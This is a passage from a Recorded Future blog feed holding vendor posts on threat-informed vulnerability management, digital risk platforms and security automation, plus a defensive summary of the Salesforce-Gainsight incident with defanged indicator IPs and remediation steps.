        <p>Bringing threat intelligence and vulnerability management together doesn’t just streamline workflows — it reshapes how organizations reduce risk. Integrated programs operate with clearer priorities, faster response times, and better alignment across teams. Understanding these benefits helps illustrate why more enterprises are shifting toward a unified strategy.</p>
        <h3>Focused Resource Allocation (Focus on What Matters)</h3>
        <p>An integrated approach ensures your team’s limited time and effort are spent where it truly counts. Rather than patching vulnerabilities arbitrarily or in numeric order, you can concentrate on the subset that intelligence deems most dangerous. This better allocation of resources means important patches happen faster, and staff aren’t burning cycles on low-risk items.</p>
        <h3>Proactive Risk Mitigation</h3>
        <p>Combining threat intelligence with vulnerability management transforms the program from reactive to proactive. You’re not just responding to scanner reports or waiting for a breach to highlight a missed patch. You’re actively watching threat trends and preemptively fortifying systems against likely attacks. This proactive risk mitigation can stop incidents before they occur.</p>
        <h3>Improved Reporting and Compliance</h3>
        <p>An intelligence-informed VM process provides richer data for reporting up to executives or auditors. Security leaders can demonstrate not just how many vulnerabilities we patched, but justify how the fixes implemented strategically reduce risk to critical assets and keep the organization ahead of active threats. Additionally, integrating threat intelligence can strengthen compliance posture by ensuring that high-risk vulnerabilities (which often map to regulatory red flags) are dealt with promptly, thereby addressing key requirements in standards like ISO 27001, NIST CSF, or industry-specific guidelines.</p>
        <h3>Cross-Team Collaboration</h3>
        <p>When threat intelligence and vulnerability management are integrated, it breaks down silos between the teams that discover threats and those that fix them. Intelligence analysts, incident responders, vulnerability managers, and IT operations start to work from a common playbook informed by shared data. Threat intel might flag a critical new exploit; the VM team then rapidly assesses exposure and deploys patches; IT ops coordinates any system impacts, all in a coordinated workflow.</p>
        <h2>Practical Steps for Integration</h2>
        <p>Integrating threat intelligence into your VM program doesn’t require a complete overhaul. It’s a series of deliberate, achievable improvements. The key is knowing where intelligence can enhance existing workflows and how to introduce automation without disrupting core processes. These actionable steps provide a roadmap for making that transition smoothly.</p>
        <ol>
          <li><strong>Map Existing Workflows:</strong> Begin by documenting your current vulnerability management process and how information flows (or doesn’t) between the VM team and threat intelligence team. Understand your scan schedule, patch management cycle, and how decisions are made. Similarly, map out how threat intelligence is collected and disseminated in your organization.</li>
          <li><strong>Integrate Threat Intelligence Feeds and Platforms:</strong> Connect external threat intelligence sources into your vulnerability management tooling. This can be done through threat intelligence feeds integrated directly into your VM software.</li>
          <li><strong>Automate Prioritization with Risk Scoring:</strong> Leverage automated risk scoring systems that combine vulnerability data with threat intelligence to rank vulnerabilities. Dynamic risk scores (such as Recorded Future’s risk score, Microsoft’s MSRC ratings, or community metrics like CISA’s KEV and EPSS) can update continuously based on new intel. Set up your workflow so that newly discovered vulnerabilities are automatically scored for risk and use these scores to automatically reorder your patch queue.</li>
          <li><strong>Create Dashboards for Real-Time Monitoring:</strong> Develop dashboards or reports that give a consolidated, real-time view of your organization’s vulnerability risk landscape. These dashboards should blend vulnerability scanning results with threat intelligence indicators. Security operations center (SOC) analysts can monitor such a dashboard to catch critical intel updates. If a new exploit is detected for a CVE present in your network, it can be flagged immediately. Dashboards provide ongoing visibility and help both technical teams and executives understand the state of vulnerability risk at a glance.</li>
          <li><strong>Continuously Refine Based on Threat Trends:</strong> Integration is not a one-and-done project. It requires <a href="https://www.recordedfuture.com/blog/5-ways-take-vulnerability-management-program-next-level">continuous improvement</a>. Establish a feedback loop where after each patch cycle or major threat event, the teams review what was learned. Did threat intelligence correctly predict which vulnerabilities were most important? Were there incidents that revealed a missed vulnerability despite available intel? Use these insights to adjust your processes. Threat trends evolve constantly, so your integrated program should adapt.</li>
        </ol>
        <h2>Recorded Future: Taking a Holistic Cybersecurity Approach</h2>
        <p>Recorded Future’s Intelligence Platform is designed to bridge the gap between threat intelligence and vulnerability management, enabling a truly holistic approach to cyber risk reduction. With Recorded Future’s <a href="https://www.recordedfuture.com/products/vulnerability-intelligence">Vulnerability Intelligence</a> module, organizations get real-time, contextual intelligence on vulnerabilities integrated directly into their workflows:</p>
        <ul>
          <li><strong>Real-Time Risk Scoring and Alerts:</strong> Recorded Future provides a dynamic risk score for each emerging vulnerability, updated in real time based on factors like active exploit availability, mentions by threat actors, links to malware (e.g. ransomware), and underground chatter. Instead of relying solely on CVSS, security teams see a threat-informed risk rating that tells them which vulnerabilities require immediate action.</li>
          <li><strong>Actionable Context and Intelligence:</strong> Each vulnerability entry in the platform comes enriched with context. Analysts can quickly see if a vulnerability has known ties to adversaries or malware, if there are references in dark web sources, or if a proof-of-concept exploit is circulating. Recorded Future’s <a href="https://www.recordedfuture.com/platform/intelligence-graph">Intelligence GraphⓇ</a> correlates data from across the open web, dark web, technical sources, and its own research to paint a full picture.</li>
          <li><strong>Integration with VM Tools and Workflows:</strong> Recorded Future integrates with leading security solutions to reduce friction, including vulnerability management systems like Tenable and Qualys, IT service management platforms like ServiceNow, and SIEMs like Splunk, eliminating tool-switching. Integrations include both sending threat intelligence to other tools as well as bringing in data to the Recorded Future Platform. Automatic Watch List connectors, like our <a href="https://support.recordedfuture.com/hc/en-us/articles/35816048426643-Recorded-Future-Watch-List-Connector-for-Tenable-Vulnerability-Management-Getting-Started">Tenable Connector</a>, automatically sync scan data to your Recorded Future Vulnerability Watch List, ensuring teams are continuously monitoring an up-to-date list of exposures currently in their tech stack. Additionally, our flexible API and browser extension support custom integrations for unique systems.</li>
        </ul>
        <p>With these capabilities, Recorded Future helps organizations prioritize remediation with actionable intelligence, saving hours of manual research and significantly reducing the exposure window for high-risk vulnerabilities. Recorded Future empowers you to move from reactive vulnerability management to a threat-informed, efficient, and ultimately more effective program.</p>
        <h2>Best Practices for a Modern Program</h2>
        <p>Even with the right tools, success relies on following best practices that maximize the impact of an intelligence-driven vulnerability management program. Here are some best practices for a modern, integrated VM program:</p>
        <ul>
          <li><strong>Adopt Continuous Monitoring Over Periodic Scanning:</strong> Rather than scanning for vulnerabilities once a month or quarter, shift to continuous or at least more frequent discovery. Threats evolve quickly, and new critical vulnerabilities can’t wait for the next scheduled scan. Use a combination of persistent scanning, agent-based monitoring, and third-party intelligence to achieve near-real-time visibility of new vulnerabilities in your environment.</li>
          <li><strong>Align Patching with Business-Critical Assets:</strong> Not all assets are equal, and neither are vulnerabilities on those assets. Inventory your most critical applications, systems, and data, and incorporate that knowledge into your prioritization. Prioritize fixes that protect what matters most to the business.</li>
          <li><strong>Foster Collaboration Between Teams:</strong> Encourage regular communication and joint processes between the vulnerability management team, threat intelligence analysts, incident responders, and even application developers. Breaking down silos ensures that everyone understands the bigger picture of risk and works together. It also helps in getting buy-in from IT and development teams on urgent patching: when they hear directly from threat intelligence about the potential fallout of not patching, it adds urgency beyond a typical IT ticket.</li>
          <li><strong>Measure Success with Metrics:</strong> To continually improve and demonstrate value, track metrics that gauge both the efficiency and effectiveness of your vulnerability management program. Key metrics might include:
            <ul>
              <li>Mean Time to Remediation (MTTR) for critical vulnerabilities (are you patching faster as integration matures?)</li>
              <li>Number of exploitable vulnerabilities remaining unpatched (is that trending down?)</li>
              <li>Reduction in overall attack surface (perhaps measured by fewer findings on repeat scans or a drop in high-risk exposure as scored by your intel)</li>
              <li>Compliance metrics like patch SLAs met</li>
              <li>How often threat intelligence inputs lead to preventive action</li>
            </ul>
          </li>
        </ul>
        <h2>Smarter Vulnerability Management with Threat Intelligence</h2>
        <p>Integrating threat intelligence with vulnerability management is a fundamental modernization of how an organization manages cyber risk. By infusing real-world context and automation into the VM process, security teams can make smarter decisions: they fix the vulnerabilities that are most likely to be used in an attack, and they fix them faster and more efficiently than before. The result is a vulnerability management program that is not only more accurate but also more agile and resilient in the face of today’s fast-moving threat landscape.</p>
        <p>Ready to take your vulnerability management to the next level? Recorded Future’s Vulnerability Intelligence solution can help you get there. With real-time threat insights, automated risk scoring, and seamless integration into your existing tools, it provides everything you need to proactively reduce risk.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1fe2745ec5c98b330e2b284e21463d56ecf50bbe9.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[The Salesforce-Gainsight Security Incident: What You Need to Know]]></title>
            <link>https://www.recordedfuture.com/blog/salesforce-gainsight-security-incident</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/salesforce-gainsight-security-incident</guid>
            <pubDate>Wed, 26 Nov 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Learn how threat intelligence identifies supply-chain compromise risks in SaaS integrations and how Recorded Future helps organizations defend against attacks like the Salesforce-Gainsight incident.]]></description>
            <content:encoded><![CDATA[
        <p>On November 23, 2025, Gainsight confirmed that it’s actively investigating unusual activity involving its applications that are integrated with Salesforce—an incident that underscores the growing risk of supply-chain compromise through trusted SaaS integrations.</p>
        <h2>What happened</h2>
        <p>The security event came to light on November 19, when Salesforce detected suspicious API calls. The calls originated from non-allowlisted IP addresses through Gainsight applications integrated with Salesforce. To date, three unnamed customers are suspected to have been impacted. In response, Salesforce immediately <a href="https://help.salesforce.com/s/articleView?id=005229029&amp;type=1">revoked</a> access tokens associated with Gainsight applications, restricted integration functionality, and launched an investigation.</p>
        <p>The incident disrupted several Gainsight services, including Customer Success (CS), Community, Northpass, Skilljar, and Staircase, temporarily disabling their ability to read and write data from Salesforce. As a precautionary measure, other platforms, including Zendesk, Gong.io, and HubSpot, also disabled related CS connectors.</p>
        <h2>The threat landscape connection</h2>
        <p>Analysis of the indicators of compromise (IoCs) revealed concerning patterns. Some IP addresses involved in this incident, such as 109.70.100[.]68 and 109.70.100[.]71, were previously linked to an August 2025 campaign in which the financially motivated threat cluster UNC6040 compromised Salesforce CRM environments to exfiltrate sensitive data, indicating possible reuse of infrastructure against CRM targets. The August 2025 campaign reportedly coordinated with UNC6240, which claimed affiliation with the ShinyHunters extortion group, to demand payment from affected organizations.</p>
        <p>Most of the IP addresses identified are Tor exit nodes or commodity proxy/VPN infrastructure with histories of abuse for malicious activities, including scanning, brute-force attacks, and web exploitation. This suggests that the threat actors are using shared anonymity services rather than custom command-and-control (C2) infrastructure.</p>
        <p>Intelligence analysis also revealed malware samples communicating with these IP addresses across commodity families, including SmokeLoader, Stealc, DCRat, and Vidar.</p>
        <p>While Gainsight has stated that it hasn’t identified evidence of data exfiltration, and while a specific threat actor has yet to be confirmed, the investigation is ongoing.</p>
        <h2>The broader risk: supply-chain compromise</h2>
        <p>This incident highlights a critical vulnerability in modern enterprise architecture: the risk of supply-chain compromise through trusted SaaS integrations. When OAuth tokens, API keys, and service accounts enable persistent access to enterprise CRM data, a breach in one connected application can potentially expose sensitive information across multiple platforms.</p>
        <p>Despite no evidence of data exfiltration so far, customers using Gainsight-Salesforce integrations may face unauthorized access or credential misuse until proper reauthorization is completed. The potential exposure may extend beyond Gainsight to other connected applications, such as Zendesk, HubSpot, and Gong.io, that share authentication or data pipelines.</p>
        <h2>Immediate actions for affected organizations</h2>
        <p>Gainsight has already taken defensive measures, including rotating multi-factor credentials and restricting access to its VPN and critical infrastructure. However, customers who suspect exposure should consider taking the following actions:</p>
        <p><strong>Critical security steps:</strong></p>
        <ul>
          <li>Revoke and rotate OAuth tokens and API keys associated with the Gainsight-Salesforce Connected App.</li>
          <li>Review Salesforce and Gainsight logs for anomalous API traffic, unexpected IP sources, or mass data exports.</li>
          <li>Apply IP allowlists to block connections from published IoCs.</li>
          <li>Implement conditional access and device trust validation for all connected apps.</li>
          <li>Enforce multi-factor authentication and reset access credentials on all privileged accounts.</li>
          <li>Isolate integrations with third-party vendors until reauthorization guidance is confirmed.</li>
        </ul>
        <p><strong>Gainsight-specific recommendations:</strong></p>
        <ul>
          <li>Rotate S3 keys.</li>
          <li>Reset NXT passwords.</li>
          <li>Reauthorize affected integrations.</li>
          <li>Log in directly to NXT until the Salesforce Connected App is fully restored.</li>
        </ul>
        <h2>Looking ahead</h2>
        <p>As organizations increasingly rely on interconnected SaaS applications to power their operations, the security posture of each integration point becomes critical. This incident serves as a reminder that third-party applications with deep integrations into core business systems represent both operational efficiency and potential attack vectors.</p>
        <p>Organizations should evaluate their connected application ecosystems, implement zero-trust principles for API access, and ensure robust monitoring of authentication and authorization activities across all integrated platforms. The days of "set and forget" SaaS integrations are over. Continuous validation and monitoring are essential to maintaining security in a connected enterprise environment.</p>
        <p>Learn how to stay ahead of emerging threats. <a href="https://www.recordedfuture.com/get-started">Contact us to speak with one of our threat intelligence experts</a>.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_15cf75aa353a7a05bd6cc1128d100e4b5e41b5367.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Choosing a Digital Risk Intelligence Platform: 5 Key Capabilities to Evaluate]]></title>
            <link>https://www.recordedfuture.com/blog/evaluating-digital-risk-intelligence-platforms</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/evaluating-digital-risk-intelligence-platforms</guid>
            <pubDate>Mon, 24 Nov 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Evaluating digital risk intelligence platforms? Learn the 5 essential capabilities you should consider in order to protect your brand, assets, and attack surface.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways</h2>
        <ul>
          <li>The traditional “digital perimeter” paradigm for enterprise cybersecurity is no longer relevant in today’s online landscape. Instead of defending one’s internal network from the outside world, organizations must shift to a model of digital risk that takes into account every possible point of compromise.</li>
          <li>Given the continuous influx of alerts and data facing organizations today, an essential aspect of effective enterprise cybersecurity today is an effective digital risk intelligence platform. And selecting the right one is of mission-critical importance to organizations’ overall security posture.</li>
          <li>When selecting a digital risk management platform, organizations should prioritize the following five key capabilities:
            <ul>
              <li>Visibility</li>
              <li>Comprehensive brand and executive intelligence</li>
              <li>Third-party and supply chain oversight</li>
              <li>Credential monitoring</li>
              <li>Integration and contextualization</li>
            </ul>
          </li>
          <li>Recorded Future’s Intelligence Cloud platform provides the kind of comprehensive, contextualized, and integrated view that organizations require to manage digital risk effectively in today’s threat landscape.</li>
        </ul>
        <h2>Your Biggest Security Blind Spot is Now the Entire Internet</h2>
        <p>The “security perimeter” is a long-standing and deeply-ingrained idea in enterprise cybersecurity. However, what was once defined as the boundary protecting your organization’s internal network from the outside world is no longer a useful measure for understanding security posture. Today, the average organization’s actual attack surface is sprawling, variable and amorphous, consisting of every social media profile, cloud bucket, line of code in a third-party app, employee credential, and more.</p>
        <p>Anywhere and everywhere your organization and its employees operate online represents a potential point of entry or compromise. And maintaining visibility into the various exposures, threats, and risks looming over that attack surface is incredibly difficult. Most security teams are drowning in disparate alerts coming from siloed systems, struggling to keep up with and make sense of them all.</p>
        <p>Ultimately, this results in a situation in which teams lack a complete, holistic view and understanding of their <a href="https://www.recordedfuture.com/use-case/digital-risk">state of digital risk</a>. Digital risk is defined as the potential for financial loss, disruption, or reputational damage resulting from the digital technologies, data breaches, cyberattacks, or failures in IT systems and digital processes. It encompasses any threat that arises from an organization’s use of digital tools and platforms.</p>
        <p>With so much to safeguard, and so much information to sift through, organizations must find more effective ways to quickly and accurately separate signal from noise. Central to this effort is finding a digital risk management platform that is able to deliver timely, unified, contextualized, and actionable intelligence—not just streams of data—to your team.</p>
        <p>The following guide outlines the five mission-critical capabilities your digital risk management platform must have in order to keep pace with today’s perimeterless threat landscape.</p>
        <h2>5 Key Capabilities Your Digital Risk Management Platform Can’t Go Without</h2>
        <p>Evaluating a digital risk platform’s true value comes down to the following five core functions. Lacking even one of these creates a critical capabilities gap and can compromise your organization’s security posture in significant ways:</p>
        <h3>1. Visibility: A Complete, Bird’s-Eye View of Your Attack Surface</h3>
        <p>One of the most effective strategies employed by attackers today is to target the assets you don’t even know you own. After all, you can’t effectively defend what you don’t know exists. Things like shadow IT, exposed remote desktop protocols (RDP), and misconfigured cloud buckets are all excellent first entry points for an attacker to exploit.</p>
        <p>That’s why, when considering digital risk management platforms, one of the most essential capabilities to look out for is the automated, continuous mapping of all these types of external assets (e.g., IPs, domains, certificates, cloud assets, code repositories). And for this kind of visibility to provide true value, this asset inventory must be enriched with vulnerability data and risk scores to not simply show you what’s there, but what’s exploitable and to what extent.</p>
        <p>To defend your attack surface effectively, you need to see your organization the way an adversary does—with all of those blind spots illuminated, and the low-hanging fruit lit with high beams.</p>
        <p>This level of continuous, prioritized visibility allows teams to move beyond asset discovery and toward risk-based defense. Platforms with capabilities like Recorded Future’s <a href="https://www.recordedfuture.com/resources/guides/prevent-digital-risks-from-impacting-business">Attack Surface Intelligence</a> deliver this comprehensive, continuous view, helping organizations identify and secure their most exposed points before they become entryways for attackers.</p>
        <h3>2. Comprehensive Intelligence: Real-Time Brand and Executive Protection</h3>
        <p>Brand impersonation, fraudulent social media accounts, and executive spoofing are among the fastest-growing forms of digital risk today. While the nature of these attacks differs significantly from more traditional breaches, that doesn’t mean they don’t come with serious consequences. Attacks like these can erode customer trust, hinder revenue, and even create regulatory exposure within minutes of going live.</p>
        <p>Therefore, an effective digital risk intelligence platform must provide continuous monitoring across the entire digital landscape—not only for typosquatting domains (e.g., www.amazoon.com, facebok.com) but also on social media platforms, app stores, and the dark web. What’s more, when a threat is detected, the platform should enable rapid remediation through integrated or automated takedown services. Because these types of attacks can damage trust and revenue within minutes, speed is critical when it comes to detection and remediation.</p>
        <p>Brand protection is no longer a marketing issue alone. This isn’t simply about how your company is perceived by the public. It is a core security requirement. With serious implications for revenue, regulatory compliance, reputation, and more, it is mission critical that your digital risk intelligence platform enables comprehensive and responsive brand and executive protection capabilities.</p>
        <p>Recorded Future’s <a href="https://www.recordedfuture.com/blog/digital-risk-protection-overview">Brand Intelligence</a>, for example, empowers teams to detect impersonation attempts in real time and act before harm spreads, keeping both the brand and its executives protected.</p>
        <h3>3. Securing Your Partnerships: Continuous Third-Party and Supply Chain Monitoring</h3>
        <p>Every vendor, supplier, and technology partner connected to your network expands your risk footprint. Today, as the average supply chain and number of third-party vendors expand exponentially, so do the associated risks. In fact, Verizon’s 2025 DBIR reports <a href="https://www.verizon.com/business/resources/T5ea/reports/2025-dbir-data-breach-investigations-report.pdf?cjdata=MXxOfDB8WXww&amp;CMP=afc_m_p_cj_na_ot_2022_99&amp;SID=78de3210-8e37-4234-93b5-4986f7430a7a&amp;cjevent=01177a0bbf1911f081ea053a0a82b838&amp;vendorid=CJM&amp;PID=100357191&amp;AID=11365093">third-party involvement in breaches doubled to 30% (from ~15% the year prior)</a>.</p>
        <p>With over a quarter (26%) of today’s organizations managing 250 or more third-party vendor relationships, monitoring third-party risk has become a daunting task. Remember, a breach in one of their environments can quickly become a problem of your own. Traditional vendor risk assessments and annual questionnaires simply can’t keep up with today’s enormous scale and rapid pace of change.</p>
        <p>This is why an effective digital risk intelligence platform must provide continuous visibility into the security posture of all third parties in one’s ecosystem. This includes real-time monitoring for data leaks, mentions on dark web forums, and newly discovered vulnerabilities that could impact your organization through a shared dependency.</p>
        <p>With Recorded Future’s <a href="https://www.recordedfuture.com/blog/digital-risk-management">Third-Party Intelligence</a> solution, organizations can proactively monitor their supply chains, receiving alerts the moment a vendor shows signs of compromise. This kind of ongoing visibility transforms vendor risk management from a reactive checkbox exercise into a continuous, intelligence-driven process.</p>
        <h3>4. No Stone Left Unturned: Dark Web and Leaked Credential Monitoring</h3>
        <p>One-in-five data breaches are now the result of compromised credentials, with the <a href="https://blog.checkpoint.com/security/the-alarming-surge-in-compromised-credentials-in-2025/?utm_source=chatgpt.com">total volume of compromised credentials surging by over 160% thus far in 2025 alone</a>. Leaked credentials are one of the most exploited gateways for cyberattacks today, fueling everything from phishing campaigns to ransomware. Detecting these exposures before they’re used is essential for preventing account takeover and data loss.</p>
        <p>That’s why real-time monitoring for leaked credentials is an essential capability for every modern digital risk intelligence platform. When selecting a platform, one must ensure it has persistent access to gated dark web forums, marketplaces, and paste sites where stolen data circulates. It must also be able to identify when employee or customer credentials appear for sale and correlate that data with active threat campaigns. Together, these capabilities form a backbone of defense that helps to <a href="https://www.recordedfuture.com/resources/guides/prevent-digital-risks-from-impacting-business">prevent digital risk from impacting your business</a>.</p>
        <p>Recorded Future’s <a href="https://www.recordedfuture.com/products/threat-intelligence">Threat Intelligence</a> capabilities excel in this area, offering deep visibility into dark web ecosystems and issuing automated alerts for compromised credentials or stolen data. By integrating this insight into daily operations, security teams can act swiftly to prevent compromise or other harm as a result of compromised credentials, shutting down risks before they evolve into active exploitation.</p>
        <h3>5. Integration and Contextualization: A Unified Intelligence Core That Provides Context</h3>
        <p>Without a unified intelligence framework, even the best tools can create more confusion than clarity. Siloed systems generate endless alerts but rarely explain how one threat connects to another. This often results in a morass of disjointed data that leaves teams overwhelmed and uncertain of what actions to take in order to mitigate their digital risk.</p>
        <p>It is only the most mature and advanced of digital risk management platforms that bring these disparate sources and signals together to create a single, coherent, and unified picture of an organization’s overall state and provide the context necessary to inform action. Such systems operate from a single intelligence graph: one that correlates data from the open, deep, and dark web, as well as technical sources like malware sandboxes and exploit feeds. This unified approach allows security teams to see how individual risks fit into broader attack narratives and stay ahead of threats as they manifest across the digital ecosystem.</p>
        <p>For example, the platform should make it possible to connect a leaked credential to a threat actor exploiting a vulnerability in a vendor’s system (effectively combining multiple key capabilities to create a single, streamlined picture of specific threats in context). Recorded Future’s <a href="https://www.recordedfuture.com/platform/intelligence-graph">Intelligence GraphⓇ</a> provides exactly that level of correlation, transforming raw data into actionable, prioritized intelligence that allows teams to make sense of the ever-evolving threat landscape and their organization’s place within it.</p>
        <p>Together, these capabilities prove indispensable in the uphill battle that is <a href="https://www.recordedfuture.com/blog/digital-risk-protection-overview">digital risk protection</a>. Lacking just one can be enough to undermine one’s efforts entirely.</p>
        <h2>The Universal Approach: Recorded Future’s Intelligence Cloud</h2>
        <p>Modern digital risk management is a complex task that consists of a multitude of systems and signals. Running and managing separate tools for brand monitoring, attack surface management, supply chain risk, and more often creates more problems than it solves. Each system generates its own alerts and dashboards, forcing analysts to piece together the full picture manually.</p>
        <p>Recorded Future’s <a href="https://www.recordedfuture.com/platform">Intelligence Cloud</a> eliminates that complexity. It unifies all five essential capabilities—attack surface visibility, brand protection, third-party intelligence, threat intelligence, and vulnerability intelligence—into one real-time, correlated platform. This comprehensive, integrated approach ensures every piece of data contributes to a larger understanding of risk. Instead of isolated alerts, users receive a complete threat narrative: what’s happening, why it matters, and what to do next.</p>
        <p>Organizations that adopt this model not only strengthen their defenses but also gain the ability to prioritize resources effectively and demonstrate the ROI of intelligence-driven security.</p>
        <h2>Move From Reactive Defense to Proactive Intelligence</h2>
        <p>Most security teams are already overwhelmed by alerts. A digital risk intelligence platform shouldn’t add more—it should provide clarity. By consolidating external risk data into one unified view, organizations can make faster, better-informed decisions and shift from reactive defense to proactive intelligence.</p>
        <p>Investing in a single, unified platform, like Recorded Future’s, that sees and connects everything reduces analyst fatigue, accelerates response, and empowers leaders to justify their security investments with confidence.</p>
        <p>Yesterday’s perimeter-focused defense paradigm is over. Now, your organization must have visibility and control over every activity, portal, and point of entry online. Recorded Future’s Intelligence Cloud embodies this shift, offering the complete picture of digital risk every modern enterprise needs.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_190a9f903d9fbd7b56c2e00fd894596d5b7793258.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Threat Intelligence Automation]]></title>
            <link>https://www.recordedfuture.com/blog/threat-intelligence-automation</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/threat-intelligence-automation</guid>
            <pubDate>Thu, 20 Nov 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Discover how threat intelligence automation from Recorded Future empowers security teams with real-time insights, faster response, and greater efficiency.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways</h2>
        <ul>
          <li>Real-time intelligence at scale: Threat intelligence automation accelerates detection and response by processing vast threat data instantly, <a href="https://www.recordedfuture.com/blog/why-manual-cyber-operations-can-create-dangerous-gaps">far faster than any manual analysis could achieve</a>.</li>
          <li>Enhanced SOC efficiency: Automation filters false positives and handles repetitive tasks so analysts focus on true threats.</li>
          <li>Recorded Future advantage: Recorded Future’s Intelligence Cloud delivers automated threat protection through real-time data collection, machine learning analysis, and seamless integrations with tools like SIEM, SOAR, and EDR.</li>
          <li>Future-ready defense: AI and ML algorithms adapt to new attack patterns, enabling predictive threat detection and rapid response.</li>
        </ul>
        <h2>Introduction: The Need for Speed in Cybersecurity</h2>
        <p>Cyber threats are expanding in volume, complexity, and velocity. Enterprises receive thousands of security alerts every single day, and human analysts manually collecting and correlating threat data can’t keep up. These reactive workflows lead to slow threat detection and delayed response, giving attackers more time to cause damage. The result is not only missed attacks but also burned-out analysts, who face constant alert fatigue and repetitive tasks.</p>
        <p>When a breach can unfold in minutes, organizations can’t afford hours (or days) of lag. Threat intelligence automation allows security teams to respond to indicators of compromise (IOCs) within seconds, stopping attacks before they spread—and reducing the potential financial and reputational damages from a breach. The push for speed has spurred a rise in <a href="https://www.recordedfuture.com/resources/guides/state-of-ai-2025">AI and automation</a> across cybersecurity as security leaders increasingly recognize how real-time, autonomous decisions can bolster defense.</p>
        <h2>What Is Automated Threat Protection?</h2>
        <p>Automated threat protection, also known as autonomous threat protection, refers to the use of advanced technologies—including AI and ML—to continuously gather, analyze, and act on threat intelligence without manual intervention. It streamlines the entire threat intelligence lifecycle, from data collection to detection to response, at machine speed.</p>
        <p>Core capabilities of automated threat protection platforms include ingesting data from diverse sources (open web, dark web, technical feeds, internal logs, etc.), automatically correlating and analyzing threat signals, and triggering protective actions or alerts. Key functions often include real-time monitoring for IOCs, enrichment of alerts with contextual data, automated risk scoring of threats, and even initiating response workflows via SOAR (Security Orchestration, Automation, and Response) playbooks. These systems excel at processing information at a scale and speed impossible for human operators.</p>
        <p>To illustrate the difference: in a manual workflow, if a new phishing domain targeting your company is discovered, an analyst might spend precious time gathering WHOIS information, checking threat feeds for references, assessing the domain’s legitimacy, and then coordinating a response. By the time this manual analysis is done, the phishing campaign could have claimed victims. In contrast, automated threat protection can instantly recognize the suspicious domain, enrich the alert with WHOIS data and threat actor profiles, check if the domain appears in malware or phishing databases, and even automatically block the domain via integrated security controls, all before a human even starts investigating.</p>
        <h2>How Threat Intelligence Automation Enhances Real-Time Security Decisions</h2>
        <p>Threat intelligence automation <a href="https://www.recordedfuture.com/blog/from-speed-to-consistency-power-automation-for-your-soc">directly improves the speed and quality of security decisions</a> in several ways:</p>
        <h3>Faster Detection and Response</h3>
        <p>Automation enables security teams to detect threats or intrusions within moments of their emergence. By automatically correlating internal logs with external intelligence feeds, an automated system can spot malicious activity and trigger a response in machine time. This might mean isolating a compromised host or alerting on a zero-day exploit mere seconds after it’s observed. The net effect is that incidents are contained before they escalate widely.</p>
        <h3>Reduced False Positives</h3>
        <p>Intelligent automation learns what “normal” looks like in an environment and filters out the noise of benign events or erroneous alerts. Over time, machine learning models can identify patterns of false positives and automatically dismiss or deprioritize them. By letting automation sift signal from noise, human analysts can reclaim hours of wasted time and focus attention on genuine threats.</p>
        <h3>Improved Threat Prioritization</h3>
        <p>Automated threat intelligence tools provide rich context around each indicator or alert instantly. For example, when an alert comes in, an automation system might automatically append information about the involved IP’s reputation, associated malware, threat actor groups, prevalence in the wild, and more. This contextual enrichment allows the system to assess which alerts pose the greatest risk.</p>
        <h3>Consistent, round-the-clock protection</h3>
        <p>Automated systems never sleep, operating 24/7 with consistency and scaling to handle surges in threat activity. This around-the-clock monitoring means critical warnings are never missed and aligns security operations to the always-on nature of cyber attacks. Automation also enforces consistency in how threats are handled; a playbook executed by a machine will run the same way every time, reducing the variability (and potential errors) of human responses.</p>
        <h2>Recorded Future’s Approach to Automated Threat Protection</h2>
        <p>Recorded Future’s Intelligence Cloud is a SaaS platform that delivers real-time, automated threat intelligence at scale. It continuously collects billions of data points from across the open web, dark web, technical sources (like malware feeds and network telemetry), as well as insights from Recorded Future’s own research team, <a href="https://www.recordedfuture.com/research/insikt-group">Insikt Group®</a>. All of this data is analyzed and risk-scored in real time using machine learning algorithms.</p>
        <p>A key strength of Recorded Future’s approach is seamless integration. The Intelligence Cloud connects directly with popular SIEM, SOAR, EDR, and Threat Intelligence Platform (TIP) tools. This means when your SOC’s SIEM generates an alert, Recorded Future automatically enriches that alert with context within the tool you’re already using. If an alert about a suspicious IP comes into your SIEM, the Intelligence Cloud can, in real time, append that IP’s risk score, known associations, or related domains—even triggering automated response playbooks in your SOAR platform based on its intelligence.</p>
        <p>Recorded Future’s platform assigns risk scores to IOCs in real time, using analytics that weigh factors like novelty, prevalence, and severity of associated threat activity. So when an alert involving a particular IOC hits a SOC, the Intelligence Cloud has already flagged it as high risk and enriched it with context, such as the ransomware family or threat actor.</p>
        <p>Recorded Future’s approach centers on delivering actionable insight in real time and <a href="https://www.recordedfuture.com/use-case/automation-security-workflows">automating wherever possible</a>. Teams can trust they’re never operating on out-of-date information, and that many threat defense actions are happening autonomously at machine speed.</p>
        <p>Example use cases include:</p>
        <ul>
          <li><strong>Phishing detection:</strong> Suppose a new phishing email campaign targeting a financial institution is identified. Recorded Future’s Intelligence Cloud can automatically spot the phishing domains or URLs as soon as they appear on phishing feeds or dark web forums, immediately flagging them as malicious, enriching them with context, and integrating with your email security or firewall to block them.</li>
          <li><strong>Vulnerability prioritization:</strong> Recorded Future’s automation helps organizations stay ahead by tracking vulnerability disclosures and exploit chatter continuously. If a new critical vulnerability is published, the Intelligence Cloud will instantly assess if there are exploit kits or threat actors discussing it. Through integrations, it can automatically create a ticket in your ITSM or send an alert to your vulnerability management dashboard highlighting that this CVE is under active attack and should be prioritized.</li>
        </ul>
        <h2>Benefits of Adopting Recorded Future for Automated Threat Protection</h2>
        <h3>Speed and Scale in Decision-Making</h3>
